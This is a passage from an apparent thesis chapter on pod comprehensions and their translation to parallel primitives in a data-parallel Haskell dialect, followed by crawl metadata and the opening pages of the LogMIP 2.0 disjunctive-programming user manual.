
Figure 3.2(a) defines a function that negates each element of a list using a Haskell list comprehension. This syntax provides a good starting point for a parallel notation because it decomposes a problem into the transformations that occur at each element of a list. Because there is no implied sequencing of the transformations that could result in dependencies between the elements of a parallel data structure, the transformations can be applied independently, all at the same time. Figure 3.2(b) defines a pod comprehension corresponding to the list comprehension of figure 3.2(a). The desired reading of the negateV function is "for each defined processor in vec identified by y, that contains data x, create a one-dimensional pod such that each processor at y contains the data -x". Examining the definition, we see that only '-' is specific to the negateV function. This means that the computation of the vector negate can be modularised by gluing together a general pod comprehension and a function that is applied to each defined element of a pod.
By parameterising the definition of negateV on the function applied to each element of the pod, we derive mapPod, defined in figure 3.2(c).

(a) List comprehension:            negateL xs = [ -x | x <- xs ]

(b) Pod comprehension:             negateV vec = << (|y; -x|) | (|y; x|) <<- vec >>

(c) Redefinition of (b) using      mapPod f vec = << (|y; f x|) | (|y; x|) <<- vec >>
    a higher-order pod map:        negateV vec = mapPod (\x -> -x) vec

Fig. 3.2: From lists to vectors: mapping negate in parallel

As the motivation behind the aim evaluation mechanism was the efficient parallel implementation of a non-strict map, it is not surprising that mapPod has an O(1) time complexity in relation to the size of the vector being mapped. The semantics of list comprehensions is very much tied to set theory, in such a way that whenever multiple generators are used in a comprehension, all possible combinations of values are produced as a result. For example the expression

[ (x, y) | x <- [1..10], y <- [1..10] ]

generates the cartesian product of two lists. More surprisingly,

[ x | x <- [1..10], y <- [1..10] ]

generates a list with 100 elements; the computational interpretation of generators is very much tied to iteration. Since we believe that effective use of a parallel machine with thousands of processing elements can only be attained with pods containing thousands of elements, a strategy that relies upon a combinatorial explosion of values must somehow be avoided: the physical constraints of a machine's memory would soon be exhausted if pods contained millions of elements.
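The combinatorial reading of multiple list generators, and the zip-like drawing that pod comprehensions use instead, can be contrasted directly in ordinary Haskell (modelling zip-like drawing with zip):

```haskell
-- Multiple list-comprehension generators iterate combinatorially ...
cartesian :: [Int]
cartesian = [ x | x <- [1 .. 10], y <- [1 .. 10] ]        -- 100 elements

-- ... whereas zip-like drawing pairs up elements positionally.
zipLike :: [Int]
zipLike = [ x + y | (x, y) <- zip [1 .. 10] [1 .. 10] ]   -- 10 elements
```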
The solution we adopt to this problem is twofold: (1) we ensure that for each element drawn from a generator, only one element will be drawn from subsequent generators ("zip-like" drawing); (2) the drawing of elements from the generators of a pod comprehension is performed lazily, such that values are drawn only as required. Addressing the first of these issues, we exploit the fact that the index of a pod element is unique. If we draw an element (|i; v|) from a pod, we can be sure that we will not be able to draw any other element with index i. We may however wish to draw an element (|i; w|) with the same index i from some other pod in a different generator. We therefore propose two versions of the generator: (|p; pd|) <<- pod is read as drawn-from, and names in the patterns p and pd are bound by the generator; (|e; pi|) <<= pod is read as indexed-from, and the value represented by the expression e determines which processor's contents should be matched against the pattern pi. Drawn-from generators provide a point of interest. Comprehensions contain at most one drawn-from generator, as multiple points of interest make little sense for subsequent generators in a comprehension. Therefore the expression x in the index generator (|x; b|) <<= vecB of figure 3.3(a) is bound by the pattern x in the preceding drawn-from generator. The intended semantics are that the constraint of the generators ensures zip-like drawing; the comprehension therefore defines a vector addition operation.
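The zip-like reading of addV can be imitated over association lists, with lookup standing in (strictly) for the indexed-from generator; the names are illustrative only, and this model ignores the laziness of real indexed-from generators:

```haskell
-- Zip-like drawing by index: for each (|x; a|) drawn from vecA, exactly
-- one b is drawn from vecB, namely the value stored at the same index x.
-- Indices absent from vecB simply produce no result processor.
addVModel :: [(Int, Int)] -> [(Int, Int)] -> [(Int, Int)]
addVModel vecA vecB =
  [ (x, a + b) | (x, a) <- vecA, Just b <- [lookup x vecB] ]
```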
(a) addV vecA vecB = << (|x; a+b|) | (|x; a|) <<- vecA, (|x; b|) <<= vecB >>

(b) shiftAnd vec = << (|x; a&&b|) | (|x; a|) <<- vec, (|x-1; b|) <<= vec >>

(c) negateV' vec = << (|x; -y|) | (|x; y|) <<- vec, (|x; z|) <<= ⊥ >>

Figure 3.3: Comprehensions

The lazy semantics of pod comprehensions are not restricted to simple zip-like drawing. The index-generator in figure 3.3(b) defines a constraint x-1 which results in communication between elements of the pods; we return to communication a little later. The second issue, crucial to the semantics of generators, is lazy drawing. Using <<- draws elements from processors in a strict manner: the processors have to be defined for a result to be defined. However, <<= draws processors and their contents from a pod lazily, depending upon the strictness characteristics of their subsequent use. An analogy can be made between this model and refutable and irrefutable (strict and lazy) pattern matching in Haskell. The definition of negateV' shown in figure 3.3(c) has the same semantics as the earlier definition of negateV in figure 3.2(b), since the variable z is not used in the comprehension. In contrast, a similar list comprehension below tries to draw elements from ⊥, resulting in the comprehension evaluating to ⊥:

[ -x | x <- [1..10], y <- ⊥ ]

Figure 3.3(b) shows a more subtle example in which processors and their contents only have to be defined depending upon the strictness of &&. Given a processor identified by x that contains False, due to the laziness of &&, neither the processor nor its contents at the position identified by x-1 need to be defined. We clarify such semantics in figure 3.6. The constraint used in the function shiftAnd of figure 3.3(b) causes communication between elements of the vector vec.
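Before turning to communication, the strictness point about && can be reproduced with ordinary zipWith: because (&&) ignores its second argument when the first is False, the corresponding element of the second vector is never demanded.

```haskell
-- (&&) is non-strict in its second argument, so pairing a False with an
-- undefined value is harmless: the undefined element is never demanded.
lazyAnd :: [Bool]
lazyAnd = zipWith (&&) [False, True] [undefined, True]
-- evaluates to [False, True] without touching undefined
```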
We generalise such communication into two models: fetching data from a remote processor to a local processor, and sending data from a local processor to a remote one. The first expression shown in figure 3.4 uses the sending model of communication. Data stored in a processor identified by x is sent to the processor at location x+2. The effect is to shift every defined processor's contents two places to its right. In contrast, the expression on the right of figure 3.4 uses the fetching model of data communication. The value x bound by the drawn-from generator (<<-) represents the processor in which data will be placed. The data is fetched from the contents of a processor determined by the constraint on the index-generator (<<=). By drawing elements from the infinite pod inf in the drawn-from generator (every processor and index is defined), a binding occurrence for x is provided for subsequent generators. Although the use of inf looks clumsy, rarely is such trickery required in a fetch computation; see, for example, the fetch used in the definition of parallel scan in fig 4.1.2.

let f = \z -> z + 2                        let f' = \z -> z - 2
in << (|f x; y|) | (|x; y|) <<- vec >>         inf = << ..42.. >>
                                           in << (|x; y|) | (|x; _|) <<- inf,
                                                            (|f' x; y|) <<= vec >>

Figure 3.4: The duality of send and fetch

As we shall see in the denotational semantics, the clumsiness has some theoretical backing, as inf is used to create a binding occurrence for elements in ℤ, resulting in a definition which looks similar to the denotational semantic definition of fetch.
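Figure 3.4's duality can be imitated over association lists: sendModel relabels each source index with f, while fetchModel looks data up at f' of each destination index. The names, and the finite domain dom standing in for the infinite pod inf, are modelling assumptions:

```haskell
-- Sending: relabel each processor x as f x.
sendModel :: (Int -> Int) -> [(Int, a)] -> [(Int, a)]
sendModel f vec = [ (f x, y) | (x, y) <- vec ]

-- Fetching: for each destination x in the (finite) domain, place the
-- value found at f' x, if any.
fetchModel :: (Int -> Int) -> [Int] -> [(Int, a)] -> [(Int, a)]
fetchModel f' dom vec = [ (x, y) | x <- dom, Just y <- [lookup (f' x) vec] ]
```

With vec = [(0,'a'),(1,'b')], sending with (+2) and fetching with (subtract 2) produce the same shifted pod, mirroring the inverse-function duality of figure 3.4.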
In these two examples, as the lambda expression used in the fetch is the inverse of that used in the send, the two expressions are equivalent. This equivalence between sending and fetching expressions does not always hold, as the inverse of a function used in data communication may not exist. For example, with the sending expression

<< (|f a; v|) | (|a; v|) <<- vec >>

vec may contain (|x; vx|) and (|y; vy|) where f x = f y. In this case, either (|f x; vx|) or (|f y; vy|) might appear in the solution, though not both, since an index must identify a unique value. An implementation may choose either solution (see section 3.5.5). Constraints of a different nature can also be applied to pod comprehensions in the form of boolean guards. These guards act as filters that select those processors for which the guard is True from a more general stream created by the generators. For example the expression

<< (|x; x|) | (|x; 42|) <<- vec, even x >>

defines a pod in which each processor contains its identifier, as long as that processor originally contained the number 42 and its processor identifier is even. A collection of higher-order functions based upon the examples in this section is shown below. The mapPod function of figure 3.2 is generalised to form a zip-with computation by using a drawn-from generator in a pod comprehension. The sendPod and fetchPod functions are based upon the communication functions of figure 3.4. sendIPod is similar to sendPod, except that an index-pod (i.e., a pod containing elements that identify the processors in another pod) is used to specify the processors where communication occurs to and from.
> mapPod :: Pid x => (a -> b) -> <<(|x; a|)>> -> <<(|x; b|)>>
> mapPod fn vec = << (|x; fn y|) | (|x; y|) <<- vec >>
>
> zipWithPod :: Pid x => (a -> b -> c) -> <<(|x; a|)>> -> <<(|x; b|)>> -> <<(|x; c|)>>
> zipWithPod fn vecA vecB = << (|x; fn y z|) | (|x; y|) <<- vecA,
>                                              (|x; z|) <<= vecB >>
>
> fetchPod :: (Pid x, Pid y) => (x -> y) -> <<(|y; a|)>> -> <<(|x; a|)>>
> fetchPod fn vec = << (|x; y|) | (|x; _|) <<- inf,
>                                 (|fn x; y|) <<= vec >>
>
> sendPod :: (Pid x, Pid y) => (x -> y) -> <<(|x; a|)>> -> <<(|y; a|)>>
> sendPod fn vec = << (|fn x; y|) | (|x; y|) <<- vec >>
>
> sendIPod :: (Pid x, Pid y) => <<(|x; y|)>> -> <<(|x; a|)>> -> <<(|y; a|)>>
> sendIPod ivec vec = << (|i; v|) | (|x; i|) <<- ivec,
>                                   (|x; v|) <<= vec >>

3.5 The semantics of POD comprehensions: primitive operations

The formal semantics of pods and pod comprehensions is given in terms of translation rules that produce Haskell enriched with the primitive parallel operations mapn, indices, fetch and send. The rules provide an insight into the implementation of the data-parallel extensions by using a "concrete" representation of parallel objects, where all communication is performed by primitive data-rearrangement operations. The denotational semantics of the parallel data structures and primitive operations is given in Chapter 3. Here we give an informal description of the primitives, along with definitions in terms of pod comprehensions.

3.5.1 ⊥ and the representation of pods

Before describing the primitive parallel operations, we set the scene by highlighting various problems and peculiarities associated with ⊥ (bottom) in data-parallel programs. Figure 3.5(a) defines an expression with a value equivalent to ⊥. Evaluation at an undefined processor of a pod results in ⊥; the expression in figure 3.5(b) is therefore interpreted as only defining values for processors one and three.

(a) let bot = bot in bot

(b) << (|1; 2|), (|3; 4|) >>

(c) << (|1; 2|), (|2; bot|), (|3; 4|) >>

(d) let f 0 = bot
        f n = n
    in << (|f x; y|) | (|x; y|) <<- vec >>

Figure 3.5: A selection of bottoms

The semantics of (b) differs from the pod shown in figure 3.5(c), although indexing (b) and (c) at any index produces the same values. The difference between the two expressions is highlighted by mapping \x -> 42 over each pod. Indexing the resulting pods at processor two results in ⊥ for (b) but 42 for (c). Figure 3.5(d) shows a peculiar case of bottom. If the expression in the index position of a processor on the left-hand side of a comprehension results in bottom (such as processor f 0 in (d)), the effect is to erase that processor's contents from the resulting pod representation: a pod can never be indexed at processor ⊥. Keeping such characteristics of pods in mind, we present a representation of a pod suitable for implementation on a SIMD machine. A conventional non-strict evaluation mechanism enables expressions such as (a) to be manipulated.
An extended evaluator based upon the aim mechanism allows expressions such as (c) and (d), because only those processors defined by the aim are ever evaluated. Unfortunately, (b) poses problems. Pods are implemented as extensible, dense, array-like structures: if processors x-1 and x+1 exist, then processor x exists. Such an "implementation" pod or vector has no representation for the semantics required in figure 3.5(b). Therefore when vectors are used to model pods, the vectors need to encode a representation of "not here" for any undefined processors. A solution to this problem is to represent pods by the product type:

data <<(|Int; a|)>> = MkPod <<Bool>> <<a>>

where <<a>> represents an implementation vector of type a. Wherever the value of an entry in the boolean mask defined in the first part of the product type is True, the corresponding element in the second vector has a defined processor: "I'm here". Although it seems that a lot of trouble has been expended on fulfilling the desired semantics of figure 3.5(b), they ensure an important invariant that is required in the implementation of mapn (see fig 5.1.2).

3.5.2 map

The primitive function mapn is analogous to the family of list functions map, zipWith, zipWith3, etc. The drawing of elements occurs as required in a zip-like manner by index. All the function applications of the map occur synchronously and in parallel at those processors defined by the aim of evaluation.
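The mask-plus-data representation, and a mapping primitive that preserves it, can be modelled with finite lists standing in for implementation vectors; the names are illustrative assumptions:

```haskell
-- Mask-plus-data model: a False mask entry means "not here", so indexing
-- there is bottom even after a map has rewritten every data entry.
data PodRep a = MkPodRep [Bool] [a]

indexRep :: PodRep a -> Int -> a
indexRep (MkPodRep mask dat) i
  | i < length mask && mask !! i = dat !! i
  | otherwise                    = error "undefined processor"

-- A map over the representation touches only the data vector; the mask,
-- and hence the set of defined processors, is preserved.
mapRep :: (a -> b) -> PodRep a -> PodRep b
mapRep f (MkPodRep mask dat) = MkPodRep mask (map f dat)
```

Mapping \_ -> 42 over a pod with a hole at processor two leaves processor two undefined, matching the distinction drawn between figures 3.5(b) and 3.5(c).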
Informally, the semantics of map1 and map2 are defined by the pod comprehensions below, where vec has a vector type, and not a pod type:

map1 :: (a -> b) -> <<a>> -> <<b>>
map1 f vec = << (|x; f y|) | (|x; y|) <<- vec >>

map2 :: (a -> b -> c) -> <<a>> -> <<b>> -> <<c>>
map2 f vecA vecB = << (|x; f y z|) | (|x; y|) <<- vecA, (|x; z|) <<= vecB >>

3.5.3 indices

A pod comprehension manipulates the indices of a pod as integers. As with arrays, these indices are an abstraction of the contiguous nature of a machine's memory. Given the index n of the first pod element, the (k + n)th pod element will be at a fixed offset k from the prior element. As the indices are an implicit part of the pod representation, the primitive function indices "recreates" the processor number by converting a vector of booleans into a vector in which each processor contains an integer that represents the processor number. Informally, indices can be defined by the vector comprehension:

indices :: <<Bool>> -> <<Int>>
indices mask = << (|x; if m then x else error "Bottom"|) | (|x; m|) <<- mask >>

3.5.4 fetching

An index vector is a vector of integers which is used to identify the processors in which communication occurs to and from. Evaluation of fetch ivec data, where (|x; i|) ∈ ivec, fetches the contents of processor i from data, and places it in processor x. The novel feature of fetching communication is that it is inherently lazy.
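Ignoring masks, laziness, and unboundedness, the data movement that fetch performs over a dense finite vector is a backpermute; a minimal sketch:

```haskell
-- fetch as a backpermute over finite dense vectors: the element placed at
-- position x is the one found in dat at position (ivec !! x). The real
-- primitive is lazy and aim-driven; this sketch is strict and finite.
fetchDense :: [Int] -> [a] -> [a]
fetchDense ivec dat = [ dat !! i | i <- ivec ]
```

For example, fetchDense [2,0,1] "abc" rearranges the vector to "cab".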
In the implementation, if a fetching primitive is evaluated with an aim α, then only those processors of ivec defined by α are evaluated. Once evaluated, this vector is used to construct a new aim β which is used in the evaluation of data. Once data is evaluated, communication occurs that transfers the contents of each of the evaluated processors into a destination specified by the original index vector ivec. Informally, the semantics can be expressed as the pod comprehension below:

fetch :: <<Int>> -> <<a>> -> <<a>>
fetch ivec data = << (|x; y|) | (|x; i|) <<- ivec, (|i; y|) <<= data >>

3.5.5 sending

The sending primitive, which has the informal semantics shown by the pod comprehension below, has two problems associated with it: (1) sending does not fit into the 'aim' model of evaluation, as a search of a potentially infinite pod is required; (2) multiple processors may send their contents to the same processor, and it is not clear how this should be resolved.

send :: <<Int>> -> <<a>> -> <<a>>
send ivec data = << (|i; y|) | (|x; i|) <<- ivec, (|x; y|) <<= data >>

The first of these problems is a result of incorporating laziness into a data-parallel language. Aims are a technique for ensuring that map can be implemented in a synchronous manner on a data-parallel machine. In the implementation, a data-parallel evaluation mechanism threads the aim throughout a program, continually calculating which set of processors needs to be evaluated. The sending primitive throws a spanner into the works of the aim mechanism.
If the primitive send ivec data is evaluated with an aim α, then the index vector ivec is inverted, and the primitive fetch ivec⁻¹ data is performed; the essence of send is the run-time calculation of which processors are needed to convert the send into a fetch. Unfortunately, inverting the index vector is not simple, as ivec is potentially infinite. Given the aim α, ivec is evaluated in such a way that every processor identified by the aim is accounted for by some i where (|x; i|) ∈ ivec. If no processor sends its data to a processor identified by the aim, then evaluation of the index vector may continue for a very long time. This is the motivation behind the "bottom" semantics for undefined processors: the search of the index vector in a sending communication may not terminate. The second problem associated with sending has been addressed many times elsewhere [65, 66]. The common technique used to resolve collisions in a send is to apply an associative binary operator to all colliding data. As this technique is potentially useful, some parallel computer manufacturers have provided communication hardware for making collisions more efficient [11]. In our setting, however, each list of colliding values will not be nil (i.e., []) terminated: the tail of the list will always contain bottom, as we cannot determine when a potentially infinite set of processors has stopped sending data. This means strict functions such as + cannot be used to resolve collisions. The solution we adopt is to choose a single value from the colliding data.

aexp  ::= << (|exp; exp|) | pqual1, ..., pqualn >>   (pod comprehension)
pqual ::= exp                                        (filter)
        | (|var; var|) <<- exp                       (drawn-from)
        | (|exp; var|) <<= exp                       (indexed-from)

Figure 3.6: Syntax of POD comprehensions
Although this implies a non-deterministic semantics, an implementation on a SIMD machine will always be deterministic.

3.6 The semantics of POD comprehensions: desugaring

The semantics of pod comprehensions (syntax shown in figure 3.6) is presented in terms of a series of translation rules that "desugar" the comprehensions into the primitive parallel operations presented in the previous section. The motivation behind this desugaring is the conversion of the "microscopic" view of transformations applied to the elements of a pod into a "macroscopic" view of applying monolithic operations to the pod as a whole. This translation, defined by the schema TPOD, provides the foundations for the vectorisation of functional programs described in Chapter 5. The initial state of the translation scheme is TPOD [[pod]] [] <<...True...>>, and to eliminate scoping problems the patterns in generators are assumed to be unique variables. The translation scheme uses the following information for book-keeping purposes:

1. a mapping from bindings in a source-language comprehension that represent elements of a parallel object, to bindings in the translated language that represent entire parallel objects. For example, given the expression 'x + 2' where x represents an element of a parallel object, the translation produces expressions of the form map1 (\x -> x + 2) x', in which x' represents the entire parallel object that x is an element of; the mapping x -> x' is recorded during translation. When the notation binds[x -> y] is used on the top line of a translation rule, it requires the mapping x -> y to be a member of the environment. When it is used on the right-hand side of the translation, it defines that the environment is extended with the mapping x -> y.

2. a mask which defines the valid processors in the pod resulting from the comprehension.
3.6.1 Drawn-from

Drawn-from generators provide a mechanism for anchoring a point of interest for subsequent generators in a comprehension. Those processors defined in the pod being drawn from are used to define the processors in the pod that results from the comprehension. Translation rule 1 below encapsulates such semantics. Case analysis is first performed on the pod on the right-hand side of the generator to expose its implementation structure. The exposed mask that represents the defined processors of vec is then threaded through successive calls to the translation scheme, eventually re-emerging in rule 4 to define the valid processors of the pod that results from the comprehension. Notice how x' and y' in the translated code represent all the indices and contents of vec, whereas x and y in the original comprehension represented a single index and element of the pod vec. The implementation structure of pods is reinforced by this rule, as a vector of integers that represents vec's indices is created by the indices primitive.

TPOD [[ << e | (|x; y|) <<- vec, q >> ]] binds mask_junked
  = case vec of
      MkPod mask y' ->
        let x' = indices mask
        in TPOD [[ << e | q >> ]] binds[x -> x', y -> y'] mask

(Rule 1)

3.6.2 Indexed-from

Indexed-from generators provide a mechanism for expressing communication in DPHaskell. They have non-strict semantics because elements are drawn from the pod on the right-hand side of the generator as required. We achieve this in translation rule 2 by using the non-strict properties of let expressions and irrefutable pattern matching (the ~ symbol used in the case expression of rule 2). Elements are 'logically' drawn from vec only when y is evaluated in an inner scope of the comprehension. Unlike rule 1, the defined processors of vec are not used to define the processors of the resulting comprehension. In other data-parallel languages a zip-like computation results in a parallel object whose extent is defined by the intersection of the argument objects. In DPHaskell, the resulting pod will have processors defined wherever they are defined in the drawn-from generator. Any further restrictions caused by the index generators depend upon the strictness characteristics of the functions that force the index generator's vector. This is achieved in rule 2 by suspending the "processor exists" check within the let expression identified by y'. When y' is forced, a fetch communication occurs that evaluates the index vector represented by the expression ef. This vector is then used to create the aim for the evaluation of data'. Only at this point in the whole computation is the processor-exists check performed, and data' evaluated.

TPOD [[ << e | (|ef; y|) <<= vec, q >> ]] {b1 -> b1', ..., bn -> bn'} mask
  = case vec of
      ~(MkPod mask' data') ->
        let y' = fetch (mapn (\b1 ... bn -> ef) b1' ... bn')
                       (map2 (\m d -> if m then d else ⊥) mask' data')
        in TPOD [[ << e | q >> ]] {y -> y', b1 -> b1', ..., bn -> bn'} mask

(Rule 2)

3.6.3 Filtering

Translation rule 3 for filtering expressions is relatively straightforward. As a filter restricts the processors of the pod resulting from the comprehension, we apply the logical 'and' of the mask that represents the defined processors and the filtering expression.
TPOD [[ << e | ef, q >> ]] {b1 -> b1', ..., bn -> bn'} mask
  = TPOD [[ << e | q >> ]] {b1 -> b1', ..., bn -> bn'}
         (mapn+1 (\m b1 ... bn -> m && ef) mask b1' ... bn')

(Rule 3)

3.6.4 Left-hand side

The base case for the translation scheme is shown in rule 4. An expression such as e1 in the index position of a processor represents a sending type of communication. We apply such communication to the mask that represents the defined processors, and to the expression e2 that represents the contents of those processors. This new mask and parallel object are finally used to recreate the user representation of a pod that encapsulates the meaning of the original pod comprehension.

TPOD [[ << (|e1; e2|) | >> ]] {b1 -> b1', ..., bn -> bn'} mask
  = let svec = mapn (\b1 ... bn -> e1) b1' ... bn'
    in MkPod (send svec mask)
             (send svec (mapn (\b1 ... bn -> e2) b1' ... bn'))

(Rule 4)

Figure 3.4 hinted at the possibility of simplifying communications expressed in terms of send into semantically equivalent communications using fetch. Rule 4 of TPOD always introduces a sending communication which, with a little effort, can be eliminated from the translated code. For example, in the translation below, the index vector svec used in both send operations is the vector created by the indices function. As the send communicates each processor's contents to itself, the send primitive can be removed from the translated program.

TPOD [[ << (|x; a&&b|) | (|x; a|) <<- vec, (|x-1; b|) <<= vec, f x >> ]] [] <<...True...>>

⇒ case vec of
    MkPod mask a' ->
      let x' = indices mask
      in case vec of
           ~(MkPod mask' data') ->
             let b' = fetch (map2 (\x a -> x-1) x' a')
                            (map2 (\m d -> if m then d else ⊥) mask' data')
             in let svec = map3 (\b x a -> x) b' x' a'
                in MkPod (send svec (map4 (\m b x a -> m && f x) mask b' x' a'))
                         (send svec (map3 (\b x a -> a && b) b' x' a'))

simplify ⇒

case vec of
    MkPod mask a' ->
      let x' = indices mask
      in case vec of
           ~(MkPod mask' data') ->
             let b' = fetch (map2 (\x a -> x-1) x' a')
                            (map2 (\m d -> if m then d else ⊥) mask' data')
             in MkPod (map4 (\m b x a -> m && f x) mask b' x' a')
                      (map3 (\b x a -> a && b) b' x' a')

3.7 Conclusions

Pod comprehensions provide a mechanism for expressing data-parallel computations. Using an evaluation strategy which maintains a record of the elements of a parallel object that need evaluating, data-parallelism and non-strictness can be incorporated in the same language. In practical terms this means we can ignore problems that arise from composing functions that perform computations over differing-sized parallel data structures. By using infinite pods with functions such as mapPod, finite computations can be performed on the resulting 'glued' functions. Unlike existing data-parallel languages, pod comprehensions provide a single framework within which communication and parallelism can be expressed.
olmocr_science_pdfs
2024-11-27
2024-11-27
18a49510c7c7bca30ef1b92cdb3aa6058c3098eb
[REMOVED]
{"Source-Url": "https://hal-ecp.archives-ouvertes.fr/hal-00782893/file/main.pdf", "len_cl100k_base": 15721, "olmocr-version": "0.1.53", "pdf-total-pages": 21, "total-fallback-pages": 0, "total-input-tokens": 82572, "total-output-tokens": 18872, "length": "2e13", "weborganizer": {"__label__adult": 0.0004379749298095703, "__label__art_design": 0.00077056884765625, "__label__crime_law": 0.00042724609375, "__label__education_jobs": 0.0042877197265625, "__label__entertainment": 0.00015044212341308594, "__label__fashion_beauty": 0.0002722740173339844, "__label__finance_business": 0.0006213188171386719, "__label__food_dining": 0.0005421638488769531, "__label__games": 0.001194000244140625, "__label__hardware": 0.00156402587890625, "__label__health": 0.00112152099609375, "__label__history": 0.0006661415100097656, "__label__home_hobbies": 0.0002589225769042969, "__label__industrial": 0.0009546279907226562, "__label__literature": 0.0010080337524414062, "__label__politics": 0.0004119873046875, "__label__religion": 0.0009136199951171876, "__label__science_tech": 0.349853515625, "__label__social_life": 0.00021207332611083984, "__label__software": 0.00908660888671875, "__label__software_dev": 0.62353515625, "__label__sports_fitness": 0.00034499168395996094, "__label__transportation": 0.0010471343994140625, "__label__travel": 0.0002956390380859375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 57745, 0.02368]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 57745, 0.66175]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 57745, 0.79683]], "google_gemma-3-12b-it_contains_pii": [[0, 963, false], [963, 3639, null], [3639, 6825, null], [6825, 10429, null], [10429, 13627, null], [13627, 16560, null], [16560, 19886, null], [19886, 23717, null], [23717, 26535, null], [26535, 29261, null], [29261, 32032, null], [32032, 33944, null], [33944, 37461, null], 
[37461, 39851, null], [39851, 42824, null], [42824, 45353, null], [45353, 48507, null], [48507, 51622, null], [51622, 54046, null], [54046, 57503, null], [57503, 57745, null]], "google_gemma-3-12b-it_is_public_document": [[0, 963, true], [963, 3639, null], [3639, 6825, null], [6825, 10429, null], [10429, 13627, null], [13627, 16560, null], [16560, 19886, null], [19886, 23717, null], [23717, 26535, null], [26535, 29261, null], [29261, 32032, null], [32032, 33944, null], [33944, 37461, null], [37461, 39851, null], [39851, 42824, null], [42824, 45353, null], [45353, 48507, null], [48507, 51622, null], [51622, 54046, null], [54046, 57503, null], [57503, 57745, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 57745, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 57745, null]], "pdf_page_numbers": [[0, 963, 1], [963, 3639, 2], [3639, 6825, 3], [6825, 10429, 4], [10429, 13627, 5], [13627, 16560, 6], [16560, 19886, 7], [19886, 23717, 8], [23717, 26535, 9], [26535, 29261, 10], [29261, 32032, 11], [32032, 33944, 12], [33944, 37461, 13], [37461, 39851, 14], [39851, 42824, 15], [42824, 45353, 16], [45353, 48507, 17], [48507, 51622, 18], [51622, 54046, 19], [54046, 57503, 20], [57503, 57745, 21]], 
"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 57745, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
f275ade2cc83d5a4932b3ead1d4ae14e0f89ac91
LogMIP 2.0 USER’S MANUAL October 2011 By Aldo Vecchietti aldovec@santafe-conicet.gov.ar INDEX 1. Introduction........................................................................................................... 2 2. Disjunctive model formulation........................................................................... 3 2.1 SMALL EXAMPLE 1 .................................................................................. 4 2.2 SMALL EXAMPLE 2.................................................................................. 7 2.3 NONLINEAR EXAMPLE.......................................................................... 8 3. How to write a disjunctive model for LogMIP................................................. 12 3.1 Controlling disjunctions and constraints domain.............................. 15 3.2 Using a DUMMY Equation................................................................. 15 4. Logic Propositions.............................................................................................. 16 4.1 Declaration Sentence............................................................................... 16 4.2 Definition Sentence............................................................................... 16 5. Solvers.................................................................................................................. 16 5.1 Solution Algorithms for Linear Problems................................. 17 5.2 Solution Algorithms for Non-Linear Problems......................... 17 6. Recommendations and Limitations................................................................. 19 7. References............................................................................................................ 19 1. Introduction LogMIP 2.0 is a program for solving linear and nonlinear disjunctive programming problems involving binary variables and disjunction definitions for modeling discrete choices. 
While the modeling and solution of these disjunctive optimization problems has not yet reached the stage of maturity and reliability as LP, MIP and NLP: Disjunctive problems have a rich area of applications. LogMIP 2.0 has been developed by Dr. Aldo Vecchietti from INGAR (Santa Fe-Argentina), Professor Ignacio E. Grossmann from Carnegie Mellon University (Pittsburgh-USA) and the cooperation of GAMS’s staff. It becomes a progress from its previous version (LogMIP 1.0). PLEASE NOTE: - LogMIP 1.0, works for 22.6 (December 2007) until 23.6 (December 2010) GAMS releases. - LogMIP 2.0 is included from 23.7 GAMS release. LogMIP 1.0 does not work anymore from this release. - Changes in version 2.0 are at the level of language, where LogMIP now uses the EMP syntax and modeltype. - Solvers for linear disjunctive models (Imbigm and Imchul) are combined in one new called just logmip. - In this version, non-linear disjunctive models can be solved using Big-M and convex hull relaxations algorithms. - Non-linear solver Imboa (Logic-Based Outer Approximation) does not work in LogMIP 2.0, a new version is currently developed and will be ready for a next GAMS release. - LogMIP is composed of: - language sentences for the definition of disjunctions and logic constraints, and - solvers for linear and non-linear disjunctive models. These parts are linked to GAMS, becomes a subset of GAMS language and solvers respectively. LogMIP cannot be executed independently of GAMS system. - Besides of disjunction definitions, LogMIP needs the declaration and definitions of GAMS’s scalars, sets, tables, variables, constraints, equations, etc.; for the specifications and solution of a disjunctive problem. 2. 
Disjunctive model formulation The models for LogMIP have the following general formulation (Generalized Disjunctive Programming –GDP): \[ \begin{align*} \text{min} & \quad Z = \sum_{k} c_k + f(x) + d^T y \\ \text{s.t.} & \quad g(x) \leq 0 \\ & \quad r(x) + D y \leq 0 \\ & \quad Ay \leq a \\ & \quad \bigvee_{i \in D_k} \begin{bmatrix} Y_{ik} \\ h_{ik}(x) \leq 0 \\ c_k = y_{ik} \end{bmatrix} \quad k \in \text{SD} \\ & \quad \Omega(Y) = \text{True} \\ & \quad x \in \mathbb{R}^n, \ y \in \{0,1\}^n, \ Y \in \{\text{True, False}\}^m, \ c_k \geq 0 \end{align*} \] \(x, c_k\) are continuous variables, \\ \(y\) are binary variables \((0-1)\), \\ \(Y_{ik}\) are Boolean variables, to establish whether a disjunction term is true or false, \\ \(\Omega(Y)\) logic relationships between Boolean variables, \\ \(f(x)\) objective function, which can be linear or non-linear, \\ \(g(x)\) linear or non-linear inequalities/equalities independent of the discrete choices, \\ \(r(x) + Dy \leq 0\) mixed-integer inequalities/equalities that can contain linear or non-linear continuous terms (integer terms must be linear), \\ \(Ay \leq a\) linear integer inequalities/equalities \\ \(d^T y\) linear fixed cost terms. Before explaining the details about the sentences to pose a disjunctive problems and its 